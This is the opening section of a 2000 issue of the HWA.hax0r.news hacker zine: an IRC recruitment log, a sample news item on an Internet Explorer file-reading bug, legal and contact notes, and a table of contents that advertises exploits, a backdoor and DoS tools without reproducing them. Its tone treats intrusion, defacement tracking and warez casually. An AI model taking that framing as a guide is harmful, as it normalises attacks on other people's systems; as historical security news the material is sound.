(2)
      [63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =  
  ==========================================================================
    [=HWA 2000=]               Number 51 Volume 2 Issue 3 1999    Feb 2000
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================
  =                      "ABUSUS NON TOLLIT USUM"                          =
  ==========================================================================                                                                             

                    Editor: Cruciphux (cruciphux@dok.org)
            A Hackers Without Attitudes Production. (c) 1999, 2000
                      http://welcome.to/HWA.hax0r.news/
                      
                      
                      *** NEW WEB BOARD NOW ACTIVE ***
                      
              http://discserver.snap.com/Indices/103991.html
                      
  ==========================================================================                                                  
  
                    ____
                   / ___|_____   _____ _ __ __ _  __ _  ___
                  | |   / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
                  | |__| (_) \ V /  __/ | | (_| | (_| |  __/
                   \____\___/ \_/ \___|_|  \__,_|\__, |\___|
                                                 |___/

                                      
                This is #51 covering Feb 13th to March 12th, 2000              
                
         ** 516 People are on the email notify list as of this writing.
            see note below in the Help Out! section re:distribution. 
                   
                   
    
  ========================================================================== 
  
  
                     _   _      _        ___        _   _
                    | | | | ___| |_ __  / _ \ _   _| |_| |
                    | |_| |/ _ \ | '_ \| | | | | | | __| |
                    |  _  |  __/ | |_) | |_| | |_| | |_|_|
                    |_| |_|\___|_| .__/ \___/ \__,_|\__(_)
                                 |_|
  
  
  
  
  WANT TO HELP? like what can I do? some answers to common questions, taken
  straight from IRC since, well why re-write it? :) 
  
  
  ** Regarding the people on the email notification list with listbot.
  
     I am aware that it is a pain in the ass coming to download each 
     issue (unless you can click on the url in the message body and
     easily download each new version that way...) and I am interested
     in hearing ideas to help mass distribute this material in a better
     faster, more efficient manner. If you have any suggestions or can
     offer a method or service (I don't have access to majordomo etc)
     whereby the zine can be mass mailed to subscribers, let me know.
     
     And NO I won't file attach it to you all individually :-) 
     
     
  
  
  Early one night in #Hwa.hax0r.news ...
  
  <SugarKing> Cruciphux: so do you really need help? cause I can start getting
              articles for ya if you want/need them
  <Cruciphux> yes
  <Cruciphux> damnit
  <Cruciphux> I do need help
  <SugarKing> so what do I do.....look for articles...copy and paste them.....
              then hand them to you?
  <Cruciphux> what do you want to do? 
  <Cruciphux> if you wanna do that sure, email em to me like that
  <Cruciphux> must have a source and or url though
  <SugarKing> ok
  <Cruciphux> ppl always forget urls/sources and I can't print it without a 
              source
  <Cruciphux> if u do and I haven't already put the info in you 'win' a 
              Contributed by: space sn00zer! line under the article
  <Cruciphux> :)
  <SugarKing> hehe
  <Cruciphux> and if yer good at it and get stuff I've never seen (like isn't
              on my excite newsbot list or on HNN etc) then you get
  <Cruciphux> promoted to 'staff'
  <Cruciphux> etc
  <Cruciphux> I should put this in there actually so ppl know what to expect
  <SugarKing> ok cool
  <Cruciphux> and original articles? i'd kill for good original material
  <SugarKing> heh
  <Cruciphux> stress on the 'good' but i'm not too picky if someone wants to make
              a fool of themselves in public.
  <Cruciphux> :-o
  <SugarKing> so what kinda of articles.....anything? from programming to 
              hacking....etc?
  <Cruciphux> pretty much
  <SugarKing> heh
  <Cruciphux> technology, radio, science if it has a techno slant, and of course 
              internet/web security and hacking related
  <Cruciphux> u know the drill
  <SugarKing> yeah
  <Cruciphux> also
  <SugarKing> just checkin...
  <SugarKing> heh
  <Cruciphux> I need someone to do 'research' on web site defacements
  <Cruciphux> an adjunct to what attrition does
  <Cruciphux> like tell me about interesting defacements, I just print the sites
              list i get from attrition
  <SugarKing> like how....person who defaced......??.......??
  <SugarKing> ohh ok
  <Cruciphux> theres a mailing list you can get on that tells you when sites get
              cracked
  <Cruciphux> thats a biggie i'm gonna be asking for in this issue
  <Cruciphux> print the 'good' defacements (shit with an angle) and track down/
              identify defacers and groups
  <Cruciphux> etc
  <SugarKing> ok cool:)
  <Cruciphux> with an eye towards possible profiles (group) and interviews 
              (if they're doing something interesting)
  <Cruciphux> anything else?
  <SugarKing> that looks good:)  
  <SugarKing> it doesn't seem that hard when you hear about people doing it
  <Cruciphux> k lemme know if you wanna do anything and lemme know what you want 
              to do etc
  <SugarKing> but now it sure seems harder than expected
  <Cruciphux> heh
  <SugarKing> but it'll give me something to do at least
  <Cruciphux> well I do everything myself right now in free time and there are 
              areas that i'd like to follow up on nad I just don't have the time
  <Cruciphux> so if ppl are willing to help i can keep putting out and hopefully
              things will get better too.
  <SugarKing> well....I'll do anything you want me to do.....but following up on
              defacements and getting articles seems good right now
  <Cruciphux> otherwise i'd have to think about either downsizing or closing down
              and I don't want to do that really.
  <Cruciphux> ok good stuff
  <Cruciphux> local and 'small' stuff like whats going on at your schools computer
              lab ie: security policies is good angles for writing your own stuff
              too if that tickles your fancy
  <Cruciphux> doesn't have to be major world news
  <Cruciphux> *g*
  <SugarKing> ok
  *** Quits: narq (I am free of all prejudices. I hate everyone equally)
  
  -=- 
  
  And, sending in articles etc...
  
  Instead of emailing me this: (txt formatted to 80 cols)
  
  <->
  
  
  Patching IE Security, Yet Again 


  Security vulnerability affects the Win 2000 browser. 

  Windows 2000 is finally here. And so is a patch for a security vulnerability 
  in the Internet browser that is bundled with the new operating system. 
  Microsoft issued the patch on Wednesday, the eve of the release of its 
  much-delayed operating system.

  The bug, which Microsoft calls the Image Source Redirect vulnerability, makes 
  it possible for a malicious Web site operator to read certain types of files 
  on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0, 
  and 5.01.

  This means that the iteration of IE that is distributed with Windows 2000, 
  version 5, also is affected by the bug.

  When you want to view a new page with a different domain than the one 
  currently being viewed, a Web server sends the page to your IE browser window. 
  IE then checks the server's permissions on the new page.

  The vulnerability makes it possible for a Web server to open a browser window 
  to a file stored on the IE user's computer, and then switch to a page in the 
  server's domain, gaining access to the contents of the user's files in the 
  process, Microsoft says in a statement.

  Any data that can be seen is accessible only for a short period of time, and 
  the Web site operator would need to know, or guess, the names and locations of 
  files. The operator would also be able to view only file types that can be 
  opened in a browser window, including .txt files, Microsoft says.


  http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html
  
  
  
  <->
  
  ::
  YOU can go ahead and do some editing yourself and send it like this:
  ::
  
  <->
  
  
  Patching IE Security, Yet Again 
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Contributed by SugarKing

  Security vulnerability affects the Win 2000 browser. 

  Source: PCworld
  url: http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html


  Windows 2000 is finally here. And so is a patch for a security vulnerability 
  in the Internet browser that is bundled with the new operating system. 
  Microsoft issued the patch on Wednesday, the eve of the release of its 
  much-delayed operating system.

  The bug, which Microsoft calls the Image Source Redirect vulnerability, makes 
  it possible for a malicious Web site operator to read certain types of files 
  on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0, 
  and 5.01.

  This means that the iteration of IE that is distributed with Windows 2000, 
  version 5, also is affected by the bug.

  When you want to view a new page with a different domain than the one 
  currently being viewed, a Web server sends the page to your IE browser window. 
  IE then checks the server's permissions on the new page.

  The vulnerability makes it possible for a Web server to open a browser window 
  to a file stored on the IE user's computer, and then switch to a page in the 
  server's domain, gaining access to the contents of the user's files in the 
  process, Microsoft says in a statement.

  Any data that can be seen is accessible only for a short period of time, and 
  the Web site operator would need to know, or guess, the names and locations of 
  files. The operator would also be able to view only file types that can be 
  opened in a browser window, including .txt files, Microsoft says.

  @HWA


  <->
  
  ::
  
  Doesn't seem like much but saves me a bunch of work and I can plug it straight into 
  the zine text...

  
  -=-
  
  Etc .. any other questions/comments/ideas/etc email me, you know
  the addy...
  
  -=-                       

 
  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ 
  #                                                                         #
  @      The HWA website is sponsored by CUBESOFT communications I highly   @ 
  #      recommend you consider these people for your web hosting needs,    #
  @                                                                         @   
  #      Web site sponsored by CUBESOFT networks http://www.csoft.net       #
  @      check them out for great fast web hosting!                         @ 
  #                                                                         # 
  #      http://www.csoft.net/~hwa                                          @
  @                                                                         #  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
                    
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
 
                    ____                              _
                   / ___| _   _ _ __   ___  _ __  ___(_)___
                   \___ \| | | | '_ \ / _ \| '_ \/ __| / __|
                    ___) | |_| | | | | (_) | |_) \__ \ \__ \
                   |____/ \__, |_| |_|\___/| .__/|___/_|___/
                          |___/            |_|

     
   
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  compliment such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, its a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                         Welcome to HWA.hax0r.news ... 

   =-----------------------------------------------------------------------=
   
    
    "If live is a waste of time and time is a waste of life, then lets all get
     wasted and have the time of our lives"
    						- kf

   
                            ____|  _|            |
                            __|   |   __ \   _ \ __|
                            |     __| |   |  __/ |
                           _____|_|  _|  _|\___|\__| 

    Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news
    
    **************************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed   ***
    ***                                                                    ***
    *** please join to discuss or impart news on the zine and around the   ***
    *** scene or just to hang out, we get some interesting visitors you    ***
    *** could be one of em.                                                ***
    ***                                                                    ***
    *** Note that the channel isn't there to entertain you its purpose is  ***
    *** to bring together people interested and involved in the underground***
    *** to chat about current and recent events etc, do drop in to talk or ***
    *** hangout. Also if you want to promo your site or send in news tips  ***
    *** its the place to be, just remember we're not #hack or #chatzone... ***
    **************************************************************************
    
    
    

        
  =--------------------------------------------------------------------------=
  
  
                     _____            _             _  
                    / ____|          | |           | |
                   | |     ___  _ __ | |_ ___ _ __ | |_ ___
                   | |    / _ \| '_ \| __/ _ \ '_ \| __/ __|
                   | |___| (_) | | | | ||  __/ | | | |_\__ \
                    \_____\___/|_| |_|\__\___|_| |_|\__|___/


           
  =--------------------------------------------------------------------------=
  [ INDEX ]                     HWA.hax0r.news                            #51
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. LEGAL & COPYRIGHTS ..............................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. THIS IS WHO WE ARE ..............................................
            
             ABUSUS NON TOLLIT USUM? 
             This is (in case you hadn't guessed) Latin, and loosely translated
             it means "Just because something is abused, it should not be taken
             away from those  who use it properly). This is our new motto.         

  =--------------------------------------------------------------------------=
    Key     Content    
  =--------------------------------------------------------------------------=
  
  
    "The three most dangerous things in the world are a programmer with a
     soldering iron, a hardware type with a program patch and a user with
     an idea." - Unknown

  

    01.0  .. GREETS ...........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ............................
     01.2 .. Mailbag ..........................................................
    02.0  .. From the Editor................................................... 
    03.0  .. Who are Hackers anyway?...........................................
    04.0  .. Mr DoS: Mafiaboy isn't done baring his teeth (Vetesgirl) + (ABC)..
    04.1  .. More on MafiaBoy. Some IRC logs of his rants in hacker channels...
    04.2  .. Mounties Know Mafiaboy............................................
    05.0  .. Updated proxies and wingates...from irc4all and elsewhere.........
    06.0  .. HNN:Feb 14:FBI Zeros in on Two Possible Suspects..................
    07.0  .. A brief history of hackers By meliksah............................
    08.0  .. New phreaking zines released can you dig the retro?...............
    09.0  .. Has your PC been Hi-Jacked??......................................
    10.0  .. Interview with Sect0r.............................................
    11.0  .. Is aureate.com spying on you?.....................................
    12.0  .. German youth charged in DoS attacks...............................
    13.0  .. DigiAlmty, NASA hacker gets nabbed................................
    14.0  ,, Discussion on DigiAlmty and general underground chat..............
    15.0  .. Microsoft cancels tournament after cybercrime.....................
    16.0  .. Microsoft on 'Open Windows': Baloney!.............................
    17.0  .. Defending privacy and law enforcement.............................
    18.0  .. Cyber Safe or Gov't Surveillance? ................................
    19.0  .. First Win2000 Fix Out ............................................
    20.0  .. Boy, 14, charged with hacking.....................................
    21.0  .. Defense Agency plans cyber-terrorism unit ........................
    22.0  .. WWW,HACK,CO.ZA is back online.....................................      
    22.1  .. (Update: Offline again!?!)........................................
    23.0  .. Dangerous hacking agent discovered (Troj_Trinoo)..................
    24.0  .. Hacking or administrating your school? here's The Big-Lan FAQ.....    
    25.0  .. Exclusive: Fuqrag gets raided by OSI, NASA, FBI, Interpol.........     
    26.0  .. Exclusive: Team Ech0 (pre-bust) interview.........................
    27.0  .. Phreaking good fun with DTMF and other goodies....................
    27.1  .. Introducing b0f (BufferOverflow Security).........................
    28.0  .. New way of exploiting buffer overflows ret-into-libc (b0f)........
    29.0  .. warftpd.c exploit code from b0f...................................      
    30.0  .. FTPCAT 1.0 by lamagra (b0f).......................................
    31.0  .. Redhat 6.1 /usr/bin/man exploit. Gives egid=man by venglin (b0f)..
    32.0  .. Proftpd pre <=6 remote exploit for linuxppc by lamagra (b0f)......
    33.0  .. Dopewars 1.4.4 remote exploit for server and client (b0f).........
    34.0  .. Simple Backdoor. Shell on a port with password support (b0f)......
    35.0  .. Pirch98 ident/fserve daemon DoS attack. by eth0 (b0f).............
    36.0  .. Simple ipchains frontend script  by eth0 (b0f)....................
    37.0  .. HNN:Feb 14th:Clinton Calls for Cyber Security Summit. ............
    38.0  .. HNN:Feb 14th:Black, White, Grey, Where Exactly is the Line. ......
    39.0  .. HNN:Feb 14th:Italian Cyber Criminals Apprehended .................
    40.0  .. HNN:Feb 14th:RealNames Customer Info and CC Numbers Stolen .......
    41.0  .. HNN:Feb 14th:Hacker Hijack or Misconfigued Server? ...............
    42.0  .. HNN:Feb 14th:Windows 2000 Has 63,000 Bugs ........................
    43.0  .. HNN:Feb 15th:Buffer overflow: DeCSS...............................
    44.0  .. HNN:Feb 15th:Suspects Sought in DDoS Attacks .....................
    45.0  .. HNN:Feb 15th:Hackers Invited to Summit............................
    46.0  .. HNN:Feb 15th:Stacheldraht Author Retires..........................
    47.0  .. HNN:Feb 15th:CNN News Chat with Clinton Compromised?..............
    48.0  .. HNN:Feb 15th:RSA Web Page Redirected..............................
    49.0  .. HNN:Feb 15th:Doubleclick Announces New Privacy Plan...............
    50.0  .. HNN:Feb 16th:UCITA Passes In Virginia.............................
    51.0  .. HNN:Feb 16th:Read Our Lips: No New Net Laws.......................
    52.0  .. HNN:Feb 16th:Tax Returns Inadvertently Made Public................
    53.0  .. HNN:Feb 16th:AOL Intruder Sentence Increased......................
    54.0  .. HNN:Feb 16th:China Denies Defacing Japanese Sites.................
    55.0  .. HNN:Feb 16th:Tulsa Police Break Up Online 'Gang'..................
    56.0  .. HNN:Feb 17th:Feds still nvestigating..............................
    57.0  .. HNN:Feb 17th:Correction: UCITA Did Not Pass In VA, Yet............
    58.0  .. HNN:Feb 17th:Defense Message System Has Serious Holes.............
    59.0  .. HNN:Feb 17th:CIA Startup Works on Net Security....................
    60.0  .. HNN:Feb 20th:Bill Will Double Title 18 Penalties..................
    61.0  .. HNN:Feb 20th:Racketeering Charges Sought for Cyber Criminals......
    62.0  .. HNN:Feb 20th:Serious Online Security Issues Found at EPA..........
    63.0  .. HNN:Feb 20th:FBI Reveals ACES.....................................
    64.0  .. HNN:Feb 20th:New Version of DeCSS Available.......................
    65.0  .. HNN:Feb 20th:Y2K Hack Planned for Israel, Local Officials Nervous.
    66.0  .. HNN:Feb 21st:French Say Windows is BackDoored By NSA..............
    67.0  .. HNN:Feb 21st:France Reported to Have Frenchelon...................
    68.0  .. HNN:Feb 21st:DDoS Attacks Mask the Real Threat....................
    69.0  .. HNN:Feb 21st:Earlier Attacks on IRC Servers Could Have Been a Warning
    70.0  .. HNN:Feb 21st:New DDoS Attacks Stories and Angles..................
    71.0  .. HNN:Feb 21st:Student Charged with Breaking Into High School Systems
    72.0  .. HNN:Feb 21st:Japan To Increase Cyber Defense......................
    73.0  .. HNN:Feb 21st:Possible Privacy Violation in Apple's Sherlock.......
    74.0  .. HNN:Feb 22nd:Sympatico Quiet on Search for mafiaboy ..............
    75.0  .. HNN:Feb 22nd:ISPs Look at Customer Security as Low Priority .....
    76.0  .. HNN:Feb 22nd:Circumventing DVD Zoning ............................    
    77.0  .. HNN:Feb 22nd:Voters Kill Filter Proposal..........................
    78.0  .. HNN:Feb 22nd:Former CIA Director Regrets Security Breech .........
    79.0  .. HNN:Feb 22nd:New Version of DeCSS Available ......................
    80.0  .. HNN:Feb 22nd:Windows-NT vs. CP/M .................................    
    81.0  .. HNN:Feb 24th:DigiAlmty Busted By Feds.............................
    82.0  .. HNN:Feb 24th:ISPs Form Alliance To Prevent Attacks................
    83.0  .. HNN:Feb 24th:Proposed Y2hacK Ban Not Getting Support..............
    84.0  .. HNN:Feb 24th:Microsoft Web Sites Attacked.........................
    85.0  .. HNN:Feb 24th:New DDoS Tool Released...............................
    86.0  .. HNN:Feb 25th:NDB Hit by Cyber Vandals.............................
    87.0  .. HNN:Feb 25th:Y2K Leap Day.........................................
    88.0  .. HNN:Feb 25th:Bernstein Allowed to Post Snuffle....................
    89.0  .. HNN:Feb 26th:FBI Hit with DOS.....................................
    90.0  .. HNN:Feb 26th:Police Monitor 170,000 Pay Phone Calls...............
    91.0  .. HNN:Feb 26th:Echelon on 60 Minutes................................
    92.0  .. HNN:Feb 26th:French Smart Card Researcher Sentenced...............
    93.0  .. HNN:Feb 26th:BT Network Crashed, Reason Unknown ..................
    94.0  .. HNN:Feb 26th:ISP Loses User Names And Passwords...................
    95.0  .. HNN:Feb 29th:Senate Hearings on DDoS Attacks Today................
    96.0  .. HNN:Feb 29th:NSA and CIA Form Third Secret Agency SCS.............
    97.0  .. HNN:Feb 29th:Barr Responds To NSA.................................
    98.0  .. HNN:Feb 29th:Title Email Labeled as Internet Terrorism............
    99.0  .. HNN:Feb 29th:DDoS Commentary......................................
   100.0  .. HNN:Feb 29th:Two Sites in Singapore Compromised...................
   101.0  .. HNN:Feb 29th:Swedish Intruders Get Probation......................
   102.0  .. HNN:Mar 1st:Still No Motive for DDoS Attacks......................
   103.0  .. HNN:Mar 1st:First Canadian Computer Crime Conviction..............
   104.0  .. HNN:Mar 1st:Major Systems Fail in Japan On Leap Day...............
   105.0  .. HNN:Mar 1st:HP's Cyber Insurance Takes a Hit......................
   106.0  .. HNN:Mar 1st:Security Accountability is Still Low..................
   107.0  .. HNN:Mar 2nd:Mitnick to Testify at Senate Today....................
   108.0  .. HNN:Mar 2nd:Utah Passes Net Filtering Law.........................
   109.0  .. HNN:Mar 2nd:Restaurants Gather Data on Customers..................
   110.0  .. HNN:Mar 2nd:Expedia Takes Charge for Fraud........................
   111.0  .. HNN:Mar 2nd:CD Universe Attempts to Recover From Database Theft...
   112.0  .. HNN:Mar 2nd:Sony Bungles Personal Info On Web.....................             
   113.0  .. HNN:Mar 2nd:CIA Report on Deutch Posted to Net....................
   114.0  .. HNN:Mar 2nd:Brazil Authorities Try to Combat Online Criminals.....   
   115.0  .. HWA:IGMP (kod.c kox.c trash2.c) Windows DoS (Old/but still effective)
   116.0  .. HNN:Mar 3rd:Coolio Charged With Defacement .......................
   117.0  .. HNN:Mar 3rd:US Army Web Attacker Sentenced (mindphasr/gH).........
   118.0  .. HNN:Mar 3rd:Who is Liable If Computers Used in Attacks? ..........
   119.0  .. HNN:Mar 3rd:Email Threat Lands Teenager In Jail...................
   120.0  .. HNN:Mar 3rd:Japanese Afraid of Cult Software .....................
   121.0  .. HNN:Mar 3rd:B2B Site Compromised Hours After Going Online ........             
   122.0  .. HNN:Mar 3rd:State of Maine May Give Computers to All Students. ...             
   123.0  .. HNN:Mar 6th:Coolio Not a Suspect in DDoS Attacks .................
   124.0  .. HNN:Mar 6th:Gatsby of the PhoneMasters gets 18 Months ............             
   125.0  .. HNN:Mar 6th:Cyber Intrusion Used to Cover Up Software Glitch .....
   126.0  .. HNN:Mar 6th:Microsoft Hit in Israel ..............................
   127.0  .. HNN:Mar 6th:Credit Card Numbers Used in Scam .....................
   128.0  .. HNN:Mar 6th:Iceland Sells Its Soul................................            
   129.0  .. HNN:Mar 6th: Clinton Says No To Email ............................
   130.0  .. HNN:Mar 7th:FidNet is Not Enough .................................
   131.0  .. HNN:Mar 7th:RIP Bill Comes Under Fire In UK ......................
   132.0  .. HNN:Mar 7th:Curador Returns With More CC Numbers .................
   133.0  .. HNN:Mar 7th:Taiwan Fears Computer Attack From China ..............
   134.0  .. HNN:Mar 7th:Hong Kong Beefs Up Online Police Presence ............
   135.0  .. HNN:Mar 7th:ATM and Frame Relay Vulnerable to Attack .............
   136.0  .. HNN:Mar 8th:EFF Looking For Lawyers For DeCSS Case ...............
   137.0  .. HNN:Mar 8th:Cell Surfing Not Anonymous Either ....................
   138.0  .. HNN:Mar 8th:Freenet Promises True Free Speech ....................
   139.0  .. HNN:Mar 8th:New Bills Before Congress ............................
   140.0  .. HNN:Mar 8th:Security Focus Hires Kevin Poulsen ...................
   141.0  .. HNN:Mar 9th:Coolio Charged with Web Defacements ..................
   142.0  .. HNN:Mar 9th:Grades Altered At MIT By Student .....................
   143.0  .. HNN:Mar 9th:Lloyd's Defacer Arrested and Released ................
   144.0  .. HNN:Mar 9th:Cross Green Market Raided ............................
   145.0  .. HNN:Mar 9th:AT+T Sends Private Info of Cell Surfers ..............
   146.0  .. HNN:Mar 10th: MIT Blames Cyber Vandals For Sorting Error .........
   147.0  .. HNN:Mar 10th:NY Wants Privacy for Consumers ......................
   148.0  .. HNN:Mar 10th:Curador Taunts Police ...............................
   149.0  .. HNN:Mar 10th:DDoS Attacks Used As Reason for National Court Order,
   150.0  .. HNN:Mar 10th:Voluntary Compliance With Security Practices Recommended 
   151.0  .. HNN:Mar 10th:Chinese Gangs Blamed For Identity Theft .............
   152.0  .. HNN:Mar 10th: U.S. Urges Internet Businesses to Help Fight Crime .
   153.0  .. HNN:Mar 10th:Symantec Wants List Removed .........................
   154.0  .. Janet Reno and her commie crusade into a police state.............
   155.0  .. FLYING: Xwindows game leaves files readable in system.............
   156.0  .. AIM messenger DoS.................................................
   157.0  .. Bypassing authentication on Axis StorPoint CD;....................
   158.0  .. Securax advisory, various BSOD (Windows) problems.................
   159.0  .. How to be a Script Kiddy by DrHamstuh.............................
   160.0  .. nfoSrch.cgi vulnerable to remote command execution................
   161.0  .. New magazine sampler: b0g #2......................................
   162.0  .. FreeBSD 3.4-STABLE exploit doscmd.c...............................
   163.0  .. cfingerd 1.3.3 (*bsd) root sploit.................................
   164.0  .. FreeBSD 3.3-RELEASE /sbin/umount exploit..........................
   165.0  .. l0pht advisory 03/06/2000 ClipArt gallery overflow................
   166.0  .. ISN:FBI views hackers as 'racketeers'.............................
   167.0  .. ISN:Pentagon probe targets Deutch.................................
   168.0  .. ISN:US Embassy's software originated back in the USSR.............
   169.0  .. ISN:Hacker posts phony press release..............................
   170.0  .. ISN:Hacker, Media Hype and, Disinformation........................
   171.0  .. ISN:US Secret agents work at Microsoft............................
   172.0  .. ISN:Greek hackers attack U.S military installation?...............
   173.0  .. ISN:KGB successor paid to infiltrate internet.....................
   174.0  .. ISN:REVIEW: Security Technologies for the World Wide Web..........
   175.0  .. ISN:Infosecurity at the White House...............................
   176.0  .. ISN:New hacker software could spread by email.....................
   177.0  .. ISN:FBI Admits site was defaced...................................
   178.0  .. IRIX 5.3 and 6.2 remote bind iquery overflow by LSD...............
   179.0  .. FreeBSD Sendmail 8.8.4 mime 7to8 remote exploit...................
   180.0  .. Infradig 1.225 for Windows remote security hole ..................
   181.0  .. Remote exploit for Mailer 4.3 - Win 9x/NT. By Cybz................
   182.0  .. Variation of the win98 con exploit that crashes netscape as well..
   183.0  .. Microsoft unsigned .CAB exploit...................................
        
    =-------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in 
             return thats tres cool, if not we'll consider ur ad anyways so
             send it in.ads for other zines are ok too btw just mention us 
             in yours, please remember to include links and an email contact.
             
    Ha.Ha .. Humour and puzzles  ............................................
             
              Oi! laddie! send in humour for this section! I need a laugh 
              and its hard to find good stuff... ;)...........................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
       *      COMMON TROJAN PORTS LISTING.....................................       
     A.1   .. PHACVW linx and references......................................
     A.2   .. Hot Hits (.gov and .mil + other interesting traffic on our site)
     A.3   ,, Mirror Sites list...............................................
     A.4   .. The Hacker's Ethic 90's Style..................................
     A.5   .. Sources........................................................
     A.6   .. Resources......................................................
     A.7   .. Submission information.........................................
     A.8   .. Mailing lists information......................................
     A.9   .. Whats in a name? why HWA.hax0r.news??..........................
     A,10  .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
     A.11  .. Underground and (security?) Zines..............................
     
        *  Feb 2000 moved opening data to appendices, A.2 through A.10, probably
           more to be added. Quicker to get to the news, and info etc... - Ed 
  =--------------------------------------------------------------------------=
     
     @HWA'99, 2000
     
     

     
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

                         _                     _
                        | |    ___  __ _  __ _| |
                        | |   / _ \/ _` |/ _` | |
                        | |__|  __/ (_| | (_| | |
                        |_____\___|\__, |\__,_|_|                           
                                   |___/
                               


     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF 
     THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE 
     RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
     IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS 
     (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE 
     GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS 
     Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
     ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is 
     http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE 
     ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL 
     I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email 
                         
                         cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
     ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
     AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND 
     REDISTRIBUTE/MIRROR. - EoD
     
     
                            ** USE NO HOOKS **

 
      Although this file and all future issues are now copyright, some of the 
      content holds its  own copyright and these are printed and respected. News 
      is news so i'll print any and all news but will quote sources when the 
      source is known, if its good enough for CNN its good enough for me. And 
      i'm doing it for free on my own time so pfffft. :)

     No monies are made or sought through the distribution of this material.      
     If you have a problem or concern email me and we'll discuss it.

     HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts      
     Warez Archive?), and does not condone 'warez' in any shape manner or 
     form, unless they're good, fresh 0-day and on a fast site. <sic>
 
     cruciphux@dok.org
 
     Cruciphux [C*:.] HWA/DoK Since 1989



00.1 CONTACT INFORMATION AND MAIL DROP 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                     ____            _             _
                    / ___|___  _ __ | |_ __ _  ___| |_ ___
                   | |   / _ \| '_ \| __/ _` |/ __| __/ __|
                   | |__| (_) | | | | || (_| | (__| |_\__ \
                    \____\___/|_| |_|\__\__,_|\___|\__|___/


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:
    

	    	HWA NEWS
	    	P.O BOX 44118
	    	370 MAIN ST. NORTH
	    	BRAMPTON, ONTARIO
	    	CANADA
	    	L6V 4H5
	    
	    
    
    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
    ~~~~~~~  are reading this from some interesting places, make my day and 
             get a mention in the zine, send in a postcard, I realize that 
             some places it is cost prohibitive but if you have the time and
             money be a cool dude / gal and send a poor guy a postcard 
